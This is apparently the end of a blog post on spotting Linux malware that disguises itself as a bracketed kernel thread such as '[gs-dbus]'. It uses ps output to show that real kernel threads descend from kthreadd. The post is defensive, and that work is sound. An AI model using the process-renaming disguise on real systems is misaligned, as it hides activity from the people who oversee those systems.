      8       2 root     kworker/0:0H-ev [kworker/0:0H-events_highpri]
     10       2 root     mm_percpu_wq    [mm_percpu_wq]
     11       2 root     rcu_tasks_kthre [rcu_tasks_kthread]
     12       2 root     rcu_tasks_rude_ [rcu_tasks_rude_kthread]
     13       2 root     rcu_tasks_trace [rcu_tasks_trace_kthread]
     14       2 root     ksoftirqd/0     [ksoftirqd/0]
     15       2 root     rcu_preempt     [rcu_preempt]
     16       2 root     migration/0     [migration/0]
     18       2 root     cpuhp/0         [cpuhp/0]
     19       2 root     cpuhp/1         [cpuhp/1]
     20       2 root     migration/1     [migration/1]
     21       2 root     ksoftirqd/1     [ksoftirqd/1]
     23       2 root     kworker/1:0H-ev [kworker/1:0H-events_highpri]
     24       2 root     cpuhp/2         [cpuhp/2]
     25       2 root     migration/2     [migration/2]
     26       2 root     ksoftirqd/2     [ksoftirqd/2]
     28       2 root     kworker/2:0H-ev [kworker/2:0H-events_highpri]
     29       2 root     cpuhp/3         [cpuhp/3]
     30       2 root     migration/3     [migration/3]
     31       2 root     ksoftirqd/3     [ksoftirqd/3]
     33       2 root     kworker/3:0H-ev [kworker/3:0H-events_highpri]
     38       2 root     kdevtmpfs       [kdevtmpfs]
     39       2 root     inet_frag_wq    [inet_frag_wq]
     40       2 root     kauditd         [kauditd]
     41       2 root     khungtaskd      [khungtaskd]
     42       2 root     oom_reaper      [oom_reaper]
     43       2 root     writeback       [writeback]
     44       2 root     kcompactd0      [kcompactd0]
     45       2 root     ksmd            [ksmd]
     46       2 root     khugepaged      [khugepaged]
     47       2 root     kintegrityd     [kintegrityd]
     48       2 root     kblockd         [kblockd]
     49       2 root     blkcg_punt_bio  [blkcg_punt_bio]
     50       2 root     tpm_dev_wq      [tpm_dev_wq]
     51       2 root     edac-poller     [edac-poller]
     52       2 root     devfreq_wq      [devfreq_wq]
     54       2 root     kworker/0:1H-kb [kworker/0:1H-kblockd]
     55       2 root     kswapd0         [kswapd0]
     62       2 root     kthrotld        [kthrotld]
     64       2 root     acpi_thermal_pm [acpi_thermal_pm]
     66       2 root     mld             [mld]
     67       2 root     ipv6_addrconf   [ipv6_addrconf]
     72       2 root     kstrp           [kstrp]
     78       2 root     zswap-shrink    [zswap-shrink]
     79       2 root     kworker/u9:0    [kworker/u9:0]
    123       2 root     kworker/1:1H-kb [kworker/1:1H-kblockd]
    133       2 root     kworker/2:1H-kb [kworker/2:1H-kblockd]
    152       2 root     kworker/3:1H-kb [kworker/3:1H-kblockd]
    154       2 root     ata_sff         [ata_sff]
    155       2 root     scsi_eh_0       [scsi_eh_0]
    156       2 root     scsi_tmf_0      [scsi_tmf_0]
    157       2 root     scsi_eh_1       [scsi_eh_1]
    158       2 root     scsi_tmf_1      [scsi_tmf_1]
    159       2 root     scsi_eh_2       [scsi_eh_2]
    160       2 root     scsi_tmf_2      [scsi_tmf_2]
    173       2 root     kdmflush/254:0  [kdmflush/254:0]
    175       2 root     kdmflush/254:1  [kdmflush/254:1]
    209       2 root     jbd2/dm-0-8     [jbd2/dm-0-8]
    210       2 root     ext4-rsv-conver [ext4-rsv-conver]
    341       2 root     cryptd          [cryptd]
    426       2 root     ext4-rsv-conver [ext4-rsv-conver]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 340800       2 root     kworker/0:0-cgw [kworker/0:0-cgwb_release]
 341004       2 root     kworker/1:1-eve [kworker/1:1-events]
 341535       2 root     kworker/1:2     [kworker/1:2]
 341837       2 root     kworker/2:0-mm_ [kworker/2:0-mm_percpu_wq]
 342029       2 root     kworker/2:1     [kworker/2:1]
 342136  141234 root     sshd            sshd: user [priv]
 342266       2 root     kworker/0:1-eve [kworker/0:1-events]
 342273       2 root     kworker/u8:0-fl [kworker/u8:0-flush-254:0]
 342274       2 root     kworker/3:0-ata [kworker/3:0-ata_sff]
 342278       2 root     kworker/u8:3-ev [kworker/u8:3-events_unbound]
 342279       2 root     kworker/3:1-ata [kworker/3:1-ata_sff]
 342307       2 root     kworker/u8:1-ev [kworker/u8:1-events_unbound]
 342308       2 root     kworker/3:2-eve [kworker/3:2-events]
 342310  342144 user     grep            grep --color=auto \[

Notice something?

There are only 4 processes not having a PPID of 2.

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
      2       0 root     kthreadd        [kthreadd]
 141234       1 root     sshd            sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
 342136  141234 root     sshd            sshd: user [priv]
 342310  342144 user     grep            grep --color=auto \[

One is [kthreadd] who acutally owns PID 2 and got started by PPID 0, second is my grep command and two others are from the sshd but only the [kthreadd] is actually enclosed in square brackets as it doesn't contain any commandline.

If I start a random process and rename it to [gs-dbus], similar to what the CronJob would do, it will show up in the following way:

user@host:~$ ps -eo pid,ppid,user,comm,args | grep "\["
324234  453452 admin     [gs-dbus] [gs-dbus]

PID 324234, PPID 453452 and running under the username admin. Nothing that matches the behaviour of a kernel level thread. And this should raise all red flags your mind possesses.

And this is why basics are so important. Do not just assume a software is doing nothing bad as "There is some piece of legitimate software out there on the Internet sharing the same name.". Anyone can lie. And the bad people most likely are.

Comments